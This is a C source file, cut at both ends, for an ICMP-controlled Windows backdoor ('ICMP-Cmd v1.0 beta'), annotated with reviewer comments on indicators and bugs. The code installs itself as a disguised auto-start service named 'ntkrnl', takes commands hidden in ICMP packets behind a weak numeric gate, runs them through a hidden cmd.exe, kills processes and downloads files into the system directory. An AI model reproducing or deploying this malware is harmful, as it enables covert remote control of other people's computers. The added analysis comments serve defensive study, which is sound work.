printf( " TerminateProcess failed:%d " ,GetLastError());
__leave;
}
IsKilled = TRUE;
}
__finally
{
if (hProcessToken != NULL) CloseHandle(hProcessToken);
if (hProcess != NULL) CloseHandle(hProcess);
}
return (IsKilled);
}
#include < stdio.h >
#include < urlmon.h >
#include < tlhelp32.h >
// #include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
// Tunables for the ICMP transport below.
// ICMP_PASSWORD is compared against the 16-bit ICMP sequence field of every
// received packet (see decode_resp). It is the ONLY gate in this program:
// cleartext, 16-bit keyspace, compared without ntohs, so any host that can
// reach this machine with ICMP can drive it. Detection: inbound ICMP whose
// sequence bytes on the wire are D2 04 (1234 little-endian).
#define ICMP_PASSWORD 1234
#define STATUS_FAILED 0xFFFF   // exit code handed to ExitProcess when socket setup fails
#define MAX_PACKET 6500        // size in bytes of the heap buffers used for send/receive
// Zero-initialised allocation from the process heap. No caller in this file
// ever frees what it returns (see CmdService and send).
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
/* The IP header. decode_resp treats every datagram read from the raw socket
 * as starting with this header and skips h_len*4 bytes to reach ICMP.
 * Field order matters: h_len is declared before version, relying on the
 * compiler placing the first bit-field in the low-order bits so that h_len
 * reads the IHL nibble of the first byte. */
typedef struct iphdr {
unsigned int h_len: 4 ; // header length in 32-bit words (IHL)
unsigned int version: 4 ; // IP version, 4 for IPv4
unsigned char tos; // type of service
unsigned short total_len; // total length in bytes (as on the wire, not byte-swapped here)
unsigned short ident; // identification
unsigned short frag_and_flags; // 3 flag bits plus 13-bit fragment offset
unsigned char ttl; // time to live
unsigned char proto; // protocol (TCP, UDP, ...)
unsigned short checksum; // header checksum
unsigned int sourceIP; // source address
unsigned int destIP; // destination address
}IpHeader;
// ICMP header as used by this program: the 8 standard bytes plus a 4-byte
// timestamp, 12 bytes in total (this is the "+ 12" payload offset in decode_resp).
typedef struct _ihdr
{
BYTE i_type; // type; fill_icmp_data always emits 0 (echo reply)
BYTE i_code; // code
USHORT i_cksum; // checksum over header + payload, computed in send()
USHORT i_id; // identifier; fill_icmp_data stores the low 16 bits of the process id
USHORT i_seq; // sequence number; doubles as the command gate (inbound 1234, outbound 4321)
ULONG timestamp; // GetTickCount() at send time
}IcmpHeader;
char arg[ 256 ]; // command text copied out of the ICMP payload (the copy does not NUL-terminate it)
char buffer[ 2048 ] = { 0 }; // reply text: cmd.exe pipe output, process list or a status message
void decode_resp( char * , int , struct sockaddr_in * ); // parse one received datagram and dispatch its command
void fill_icmp_data( char * icmp_data); // build the outbound ICMP header + payload from `buffer`
void pslist( void ); // append the running-process list to `buffer`
BOOL killps(DWORD id); // terminate a process by PID
void send( void ); // ship `buffer` to ICMP_DEST_IP as a raw ICMP message
char * ICMP_DEST_IP; // dotted-quad of the last command's sender; points into inet_ntoa's static storage
USHORT checksum(USHORT * buffer, int size); // RFC 1071 one's-complement checksum
HANDLE hMutex; // used by CmdControl; never created anywhere in the code shown
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void WINAPI ICMP_CmdStart(DWORD,LPTSTR * ); // ServiceMain for the "ntkrnl" service
void WINAPI CmdControl(DWORD); // SCM control handler
DWORD WINAPI CmdService(LPVOID); // worker: the ICMP receive loop
void InstallCmdService( void ); // persist as the auto-start service "ntkrnl"
void RemoveCmdService( void ); // undo InstallCmdService
void usage( char * par); // banner and command-line help
// Process entry point.
// NOTE(review): the whole service-dispatch path (the "-install"/"-remove"
// switches and StartServiceCtrlDispatcher for the "ntkrnl" service) is
// compiled out by `#if 0`, so as pasted the binary ignores its arguments and
// runs the ICMP receive loop directly in the foreground of a normal process.
int main( int argc, char * argv[])
{
#if 0
SERVICE_TABLE_ENTRY DispatchTable[] = {{ " ntkrnl " ,ICMP_CmdStart},{NULL,NULL}};
if (argc == 2 )
{
if ( ! stricmp(argv[ 1 ], " -install " ))
{
usage(argv[ 0 ]);
InstallCmdService();
}
else if ( ! stricmp(argv[ 1 ], " -remove " ))
{
usage(argv[ 0 ]);
RemoveCmdService();
}
else usage(argv[ 0 ]);
return 0 ;
}
else usage(argv[ 0 ]);
StartServiceCtrlDispatcher(DispatchTable);
#endif
CmdService( 0 ); // blocking receive loop; only a fatal socket error makes it return
return 0 ;
}
// ServiceMain for "ntkrnl": registers the control handler, reports RUNNING to
// the SCM, then starts CmdService on a new thread.
//   dwArgc / lpArgv - SCM start arguments, unused
// NOTE(review): RUNNING is reported before the worker thread exists, the
// thread handle is never closed, and a CreateThread failure leaves the service
// reported as RUNNING while doing nothing. Errors go to OutputDebugString only.
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR * lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0 ;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
ServiceStatusHandle = RegisterServiceCtrlHandler( " ntkrnl " ,CmdControl);
if (ServiceStatusHandle == 0 )
{
OutputDebugString( " RegisterServiceCtrlHandler Error ! " );
return ;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING; // reported before the worker thread is created
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdStart Error ! " );
return ;
}
hThread = CreateThread(NULL, 0 ,CmdService,NULL, 0 ,NULL); // handle is never closed
if (hThread == NULL)
{
OutputDebugString( " CreateThread in CmdStart Error ! " );
}
return ;
}
// SCM control handler for the "ntkrnl" service.
//   dwCode - SERVICE_CONTROL_* code delivered by the SCM
// PAUSE/CONTINUE only change the reported state: nothing in CmdService reads
// ServiceStatus, so the receive loop keeps running while "paused".
// STOP reports SERVICE_STOPPED but does not signal CmdService either.
// hMutex is never created anywhere in the code shown, so the
// WaitForSingleObject/ReleaseMutex/CloseHandle trio presumably operates on a
// NULL handle; their return values are ignored.
void WINAPI CmdControl(DWORD dwCode)
{
switch (dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break ;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break ;
case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE); // hMutex is never initialised in this file
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl in Switch Error ! " );
}
ReleaseMutex(hMutex);
CloseHandle(hMutex);
return ; // STOP path reports its own status and skips the common SetServiceStatus below
case SERVICE_CONTROL_INTERROGATE:
break ;
default :
break ;
}
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl out Switch Error ! " );
}
return ;
}
// Service worker / receive loop: opens a raw ICMP socket and hands every
// datagram to decode_resp() until a fatal socket error breaks the loop.
//   lpParam - unused (ICMP_CmdStart passes NULL, main passes 0)
// Returns 0 only after a non-timeout socket error; otherwise it never returns.
// Raw sockets on Windows presumably need an elevated process, which is why
// this is meant to run as a service.
// NOTE(review): the two error printf()s pass an int to "%s" (undefined
// behaviour); recvbuf is never NULL-checked; neither heap buffer is freed;
// and the memset at the bottom of the loop uses sizeof(recvbuf) — the size of
// a pointer — so it clears only the first 4/8 bytes of the buffer.
DWORD WINAPI CmdService(LPVOID lpParam) // service main: the service's work lives here
{
char * icmp_data;
int bread,datasize,retval;
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaData;
struct sockaddr_in dest,from;
int fromlen = sizeof (from);
int timeout = 2000 ; // SO_RCVTIMEO in ms; a timeout just re-enters the loop
char * recvbuf;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 )
{
printf( " WSAStartup failed: %s " ,retval); // int passed for %s
ExitProcess(STATUS_FAILED);
}
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED);
if (sockRaw == INVALID_SOCKET)
{
printf( " WSASocket() failed: %s " ,WSAGetLastError()); // int passed for %s
ExitProcess(STATUS_FAILED);
}
__try{ // MSVC structured exception handling: __finally runs on every __leave
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,( char * ) & timeout, sizeof (timeout));
if (bread == SOCKET_ERROR) __leave;
memset( & dest, 0 , sizeof (dest)); // dest stays 0.0.0.0: the probe sent below has no real target
dest.sin_family = AF_INET;
datasize = 0 ;
datasize += sizeof (IcmpHeader); // 12-byte all-zero ICMP message (type 0, seq 0)
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET); // never NULL-checked, never freed
if ( ! icmp_data) {
// fprintf(stderr,"HeapAlloc failed %d ",GetLastError());
__leave;
}
memset(icmp_data, 0 ,MAX_PACKET);
for (;;) {
int bwrote;
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest)); // result ignored
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET, 0 ,( struct sockaddr * ) & from, & fromlen); // raw socket: IP header included
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) continue ;
__leave;
}
decode_resp(recvbuf,bread, & from);
Sleep( 200 );
memset(recvbuf, 0 , sizeof (recvbuf)); // sizeof a pointer: clears 4/8 bytes, not MAX_PACKET
}
}
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
// Persistence: copy this executable to <system dir>/ntkrnl.exe (a name chosen
// to resemble the kernel image), register it as an auto-start Win32 service
// named "ntkrnl", start it, and poll until it leaves SERVICE_START_PENDING.
// Progress goes to stdout via printf; there is no return value.
// Detection / IOCs: service name and display name "ntkrnl", image file
// <system dir>\ntkrnl.exe, binary path registered with the SCM as the bare
// relative name "ntkrnl.exe", NULL account name (LocalSystem per the
// CreateService contract). Error code 5 == ERROR_ACCESS_DENIED.
// NOTE(review): InstallServiceStatus is read after the poll loop even if the
// first QueryServiceStatus call fails, in which case it is uninitialised.
void InstallCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " ); // forward slash; Win32 path APIs accept it
lpHostName = NULL; // local SCM
printf( " Transmitting File ... " );
hSearch = FindFirstFile(lpImagePath, & FileData); // existence test only
if (hSearch == INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); // path of the running image
if (CopyFile(lpCurrentPath,lpImagePath,FALSE) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == 5 ) // ERROR_ACCESS_DENIED
{
printf( " Failure ... Access is Denied ! " );
}
else
{
printf( " Failure ! " );
}
return ;
}
else
{
printf( " Success ! " );
}
}
else
{
printf( " already Exists ! " );
FindClose(hSearch);
}
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Open Service Control Manager Database Failure ! " );
return ;
}
printf( " Creating Service .... " );
schService = CreateService(schSCManager, " ntkrnl " , " ntkrnl " ,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE, " ntkrnl.exe " ,NULL,NULL,NULL,NULL,NULL); // relative binary path; NULL account = LocalSystem
if (schService == NULL)
{
dwErrorCode = GetLastError();
if (dwErrorCode != ERROR_SERVICE_EXISTS)
{
printf( " Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf( " already Exists ! " );
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_START); // reuse the existing registration
if (schService == NULL)
{
printf( " Opening Service .... Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf( " Success ! " );
}
printf( " Starting Service .... " );
if (StartService(schService, 0 ,NULL) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
{
printf( " already Running ! " );
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else
{
printf( " Pending ... " );
}
while (QueryServiceStatus(schService, & InstallServiceStatus) != 0 ) // poll until no longer START_PENDING
{
if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING)
{
Sleep( 100 );
}
else
{
break ;
}
}
if (InstallServiceStatus.dwCurrentState != SERVICE_RUNNING) // uninitialised if the first query failed
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
// Uninstall: stop and delete the "ntkrnl" service, then delete
// <system dir>/ntkrnl.exe. Also reachable remotely through the "remove" ICMP
// command in decode_resp; when that happens inside the service itself, the
// ControlService call below asks the SCM to stop the calling process.
// Error codes: 5 == ERROR_ACCESS_DENIED, 1060 == ERROR_SERVICE_DOES_NOT_EXIST.
// NOTE(review): when OpenService fails, schSCManager is closed inside the
// branch and again after it, and CloseServiceHandle is called on the NULL
// schService; left as is.
void RemoveCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " ); // same image path InstallCmdService writes to
lpHostName = NULL; // local SCM
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Opening SCM ......... " );
dwErrorCode = GetLastError();
if (dwErrorCode != 5 ) // 5 == ERROR_ACCESS_DENIED
{
printf( " Failure ! " );
}
else
{
printf( " Failuer ... Access is Denied ! " );
}
return ;
}
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_ALL_ACCESS);
if (schService == NULL)
{
printf( " Opening Service ..... " );
dwErrorCode = GetLastError();
if (dwErrorCode == 1060 ) // ERROR_SERVICE_DOES_NOT_EXIST
{
printf( " no Exists ! " );
}
else
{
printf( " Failure ! " );
}
CloseServiceHandle(schSCManager); // closed again below
}
else
{
printf( " Stopping Service .... " );
if (QueryServiceStatus(schService, & RemoveServiceStatus) != 0 )
{
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " already Stopped ! " );
}
else
{
printf( " Pending ... " );
if (ControlService(schService,SERVICE_CONTROL_STOP, & RemoveServiceStatus) != 0 )
{
while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING) // poll; QueryServiceStatus result unchecked
{
Sleep( 10 );
QueryServiceStatus(schService, & RemoveServiceStatus);
}
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " Success ! " );
}
else
{
printf( " Failure ! " );
}
}
else
{
printf( " Failure ! " );
}
}
}
else
{
printf( " Query Failure ! " );
}
printf( " Removing Service .... " );
if (DeleteService(schService) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService); // NULL handle when OpenService failed above
printf( " Removing File ....... " );
Sleep( 1500 ); // presumably gives the service process time to exit before its image is deleted
hSearch = FindFirstFile(lpImagePath, & FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
printf( " no Exists ! " );
}
else
{
if (DeleteFile(lpImagePath) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
FindClose(hSearch);
}
return ;
}
// Dispatch one received raw-socket datagram as a backdoor command.
//   buf   - full IP datagram as returned by recvfrom on the raw ICMP socket
//   bytes - number of bytes actually received (never consulted below)
//   from  - source address of the datagram; the reply goes back to it
// Command grammar (payload starts 12 bytes into the ICMP message, i.e. right
// after the 12-byte IcmpHeader): "pskill <pid>", "pslist", "remove",
// "http://<url>-<filename>"; anything else is handed to cmd.exe /c and its
// output is sent back. The only gate is icmphdr->i_seq == ICMP_PASSWORD; the
// ICMP type/code and the source address are not checked, so any ICMP-capable
// peer can issue commands.
//
// NOTE(review): documented for analysts, deliberately NOT fixed (this is a
// remote-command backdoor):
//  * no bounds check against `bytes`: the 256-byte memcpy reads past the end
//    of what was received (still inside the MAX_PACKET heap buffer);
//  * `arg` is not NUL-terminated by that copy, yet strstr/strcmp/strcat treat
//    it as a C string;
//  * "pskill" passes strstr()'s result straight to atoi — NULL if the
//    delimiter is absent;
//  * the download branch copies up to ~254 bytes into url[200] and writes
//    through strstr(fname, ...) without a NULL check;
//  * the cmd.exe branch strcat's the 256-byte arg into cmdline[270] after the
//    system directory and "/cmd.exe /c ".
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ; // IHL is in 32-bit words; taken from the packet, unvalidated
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == ICMP_PASSWORD) // raw compare, no ntohs: wire bytes D2 04
{
ICMP_DEST_IP = inet_ntoa(from -> sin_addr); // static inet_ntoa storage; consumed by send()
memcpy(arg,buf + iphdrlen + 12 , 256 ); // 12 == sizeof(IcmpHeader); copies 256 bytes regardless of `bytes`
if ( ! memcmp(arg, " pskill " , 6 ))
{
killps(atoi(strstr(arg, " "))); // strstr may return NULL when the delimiter is missing
memcpy(buffer, " Process is Killed! " , sizeof ( " Process is Killed! " )); // reported even when killps failed
send();
}
else if ( ! memcmp(arg, " pslist " , 6 )){pslist();send();}
else if ( ! strcmp(arg, " remove " ))
{
RemoveCmdService(); // self-uninstall: stop/delete the "ntkrnl" service and its file
memcpy(buffer, " Service Removed! " , sizeof ( " Service Removed! " ));
send();
return ;
}
// ---- HTTP download: "http://<url>-<filename>" -> <system dir>/<filename> ----
else if ( ! memcmp(arg, " http:// " , 7 ))
{
if ( char * FileName = strstr(arg, " - " )) // C++ only: declaration inside the condition
{
char url[ 200 ]; // FileName - arg - 1 may exceed 200: stack overflow
memset(url, 0 , 200 );
memcpy(url,arg, int (FileName - arg - 1 ));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName ++ ;
strcat(fname, " / " );
strcat(fname,FileName); // filename is attacker-supplied and not sanitised
* strstr(fname, " " ) = NULL; // NULL deref if the trailing delimiter is missing
HRESULT hRet = URLDownloadToFile( 0 ,url,fname, 0 , 0 ); // drops the file into the system directory
memset(buffer, 0 , sizeof (buffer));
if (hRet == S_OK) memcpy(buffer, " Download OK! " , sizeof ( " Download OK " )); // copies the text without its terminator; buffer was just zeroed
else
memcpy(buffer, " Download Failure! " , sizeof ( " Download Failure! " ));
send();
return ;
}
}
// ---- default: run the payload through cmd.exe /c and ship its output back ----
else {
SECURITY_ATTRIBUTES sa; // anonymous inheritable pipe capturing cmd's stdout/stderr
HANDLE hRead,hWrite;
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE; // applies to both ends: the child inherits hRead as well
if ( ! CreatePipe( & hRead, & hWrite, & sa, 0 ))
{
printf( " Error On CreatePipe() " );
return ;
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof (STARTUPINFO);
GetStartupInfo( & si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE; // hidden console window
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
char cmdline[ 270 ];
GetSystemDirectory(cmdline,MAX_PATH + 1 );
strcat(cmdline, " /cmd.exe /c " );
strcat(cmdline,arg); // unbounded: sysdir + 12 + up to 256 bytes into cmdline[270]
if ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi))
{
printf( " Error on CreateProcess() " );
return ;
}
CloseHandle(hWrite);
DWORD bytesRead;
for (;;){
// Each ReadFile overwrites buffer from offset 0, so only the last chunk
// survives, and a full 2048-byte read leaves no NUL for send()'s strlen.
if ( ! ReadFile(hRead,buffer, 2048 , & bytesRead,NULL)) break ;
Sleep( 200 );
}
// hRead, pi.hProcess and pi.hThread are never closed.
send();
}
}
// Packets whose sequence number is not ICMP_PASSWORD are silently dropped.
}
// RFC 1071 Internet checksum: one's-complement sum of 16-bit words over
// `size` bytes (a trailing odd byte is added as its own term), folded to
// 16 bits and complemented.
//   buffer - start of the data to sum
//   size   - number of bytes
// Returns the 16-bit checksum; 0xFFFF for size <= 0.
USHORT checksum(USHORT * buffer, int size)
{
    unsigned long acc = 0;
    USHORT *word = buffer;
    int remaining = size;

    for (; remaining > 1; remaining -= (int)sizeof(USHORT))
        acc += *word++;

    if (remaining)                          // odd trailing byte
        acc += *(UCHAR *)word;

    acc = (acc >> 16) + (acc & 0xffff);     // fold the carries into the low half
    acc += (acc >> 16);                     // fold the carry the fold itself may produce
    return (USHORT)(~acc);
}
// Build the outbound ICMP message in icmp_data: a 12-byte IcmpHeader followed
// by the current contents of the global `buffer` (without its NUL).
//   icmp_data - caller-provided storage of at least sizeof(IcmpHeader) +
//               strlen(buffer) bytes (send() allocates MAX_PACKET)
// The header values are the reply fingerprint: type 0 (echo reply), code 0,
// id = low 16 bits of this PID, seq = 4321 (0x10E1; no htons is applied, so
// the wire bytes are E1 10), timestamp = GetTickCount(). The checksum field
// is zeroed here and filled in afterwards by send().
// Detection: unsolicited ICMP echo replies with seq 4321 carrying process
// lists or command output in the payload.
void fill_icmp_data( char * icmp_data)
{
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ; // echo reply
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT) GetCurrentProcessId();
icmp_hdr -> i_cksum = 0 ; // computed over the finished message by send()
icmp_hdr -> i_seq = 4321 ; // reply marker
icmp_hdr -> timestamp = GetTickCount();
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,buffer,strlen(buffer)); // requires `buffer` to be NUL-terminated
// for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i];
}
// Print the banner (original author's attribution) and command-line help.
//   par - program name to show in the usage lines (argv[0])
// Only reachable from the `#if 0` section of main as pasted.
void usage( char * par)
{
printf( " =====Welcome to www.hackerxfiles.net====== " );
printf( " " );
printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- " );
printf( " ---[ E-mail: gxisone@hotmail.com ]--- " );
printf( " ---[ 2003/8/15 ]--- " );
printf( " " );
printf( " Usage: %s -install (to install service) " ,par);
printf( " %s -remove (to remove service) " ,par);
printf( " " );
return ;
}
// Send the global `buffer` to ICMP_DEST_IP as one raw ICMP message (header
// values in fill_icmp_data), then clear `buffer`.
// This declares a `send` with a different signature from Winsock's send();
// it compiles as a C++ overload, consistent with the other C++-only
// constructs in the file (declaration inside an `if` condition).
// NOTE(review): WSAStartup/WSASocket failures call ExitProcess and so take
// the whole service down; icmp_data is HeapAlloc'ed on every call and never
// freed; datasize is strlen(buffer) + 12, so `buffer` must be NUL-terminated,
// which the ReadFile loop in decode_resp does not guarantee.
void send( void )
{
WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000 ; // SO_SNDTIMEO in ms
char * icmp_data;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 ) ExitProcess(STATUS_FAILED);
if ((sockRaw = WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED))
== INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if ((bread = setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,( char * ) & timeout, sizeof (timeout))) == SOCKET_ERROR) __leave;
// send timeout set above
memset( & dest, 0 , sizeof (dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP); // sender of the last accepted command
datasize = strlen(buffer);
datasize += sizeof (IcmpHeader);
icmp_data = ( char * )xmalloc(MAX_PACKET); // never freed
if ( ! icmp_data) __leave;
memset(icmp_data, 0 ,MAX_PACKET);
fill_icmp_data(icmp_data); // header + payload
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize); // over header + payload
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest));
if (bwrote == SOCKET_ERROR)
{
// if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out ");
// printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}
// printf("Send Packet to %s Success! "<<ICMP_DEST_IP<<endl;
}
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer, 0 , sizeof (buffer)); // reply consumed; reset for the next command
Sleep( 200 );
}
void pslist( void )
{
/* Server handler for "pslist": walk the process list with a Toolhelp32
 * snapshot and append "name pid" pairs to the global `buffer`, which
 * send() later transmits. Error messages go to stdout, which for a
 * service is normally not attached to anything.
 *
 * Review notes:
 *  - strcat() into `buffer` is unbounded; on a host with many processes
 *    the accumulated text overruns `buffer` (global-buffer overflow).
 *  - `a[5]` holds at most four digits plus NUL, but PIDs with five or
 *    more digits are routine, so itoa() overruns `a` (stack overflow).
 *  - (HANDLE)-1 is INVALID_HANDLE_VALUE, the failure value of
 *    CreateToolhelp32Snapshot.
 *  - Process enumeration via a Toolhelp snapshot from a service is a
 *    common discovery step; worth a detection rule in context.
 */
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0 );
if (hProcessSnap == (HANDLE) - 1 )
{
printf( " CreateToolhelp32Snapshot() failed:%d " ,GetLastError());
return ;
}
// dwSize must be set before Process32First, per the Toolhelp contract
pe32.dwSize = sizeof (PROCESSENTRY32);
printf( " ProcessName ProcessID " );
if (Process32First(hProcessSnap, & pe32))
{
char a[ 5 ];
do
{
strcat(buffer,pe32.szExeFile);
strcat(buffer, " " );
itoa(pe32.th32ProcessID,a, 10 );
strcat(buffer,a);
strcat(buffer, " " );
// printf(" %-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, & pe32));
}
else
{
printf( " Process32Firstt() failed:%d " ,GetLastError());
}
CloseHandle (hProcessSnap);
return ;
}
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) // enable or disable one privilege on a token
{
/* Enable (bEnablePrivilege != FALSE) or disable one named privilege on
 * hToken, following the usual MSDN sample shape.
 *  hToken           - token handle; needs TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY
 *  lpszPrivilege    - privilege name, e.g. SE_DEBUG_NAME (used by killps)
 *  bEnablePrivilege - TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears attributes
 * Returns TRUE on success; FALSE if LookupPrivilegeValue fails or
 * AdjustTokenPrivileges leaves a non-success last-error.
 *
 * Review notes:
 *  - The return value of AdjustTokenPrivileges is ignored and only
 *    GetLastError() is inspected. That does catch the partial-success
 *    case (ERROR_NOT_ALL_ASSIGNED, set while the call returns TRUE), which
 *    is why the check is needed even on apparent success.
 *  - Privilege adjustment on a process token is an auditable event;
 *    enabling SeDebugPrivilege from a service is a high-signal one.
 */
TOKEN_PRIVILEGES tp;
LUID luid;
if ( ! LookupPrivilegeValue(NULL,lpszPrivilege, & luid))
{
printf( " LookupPrivilegeValue error:%d " , GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1 ;
tp.Privileges[ 0 ].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[ 0 ].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[ 0 ].Attributes = 0 ;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
& tp,
sizeof (TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf( " AdjustTokenPrivileges failed: %u " , GetLastError() );
return FALSE;
}
return TRUE;
}
/// /
BOOL killps(DWORD id) // kill-process handler
{
/* Server handler for "pskill <id>": enable SeDebugPrivilege on our own
 * token, open the target with PROCESS_ALL_ACCESS and TerminateProcess it
 * with exit code 1. Returns TRUE only if TerminateProcess succeeded.
 * Both handles are released in __finally on every path (SEH, MSVC-only).
 *
 * Review notes (least privilege / detection):
 *  - TOKEN_ALL_ACCESS and PROCESS_ALL_ACCESS request far more than is
 *    used; TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY and PROCESS_TERMINATE are
 *    what the code actually needs.
 *  - The privilege stays enabled for the life of the process; there is no
 *    matching SetPrivilege(..., FALSE).
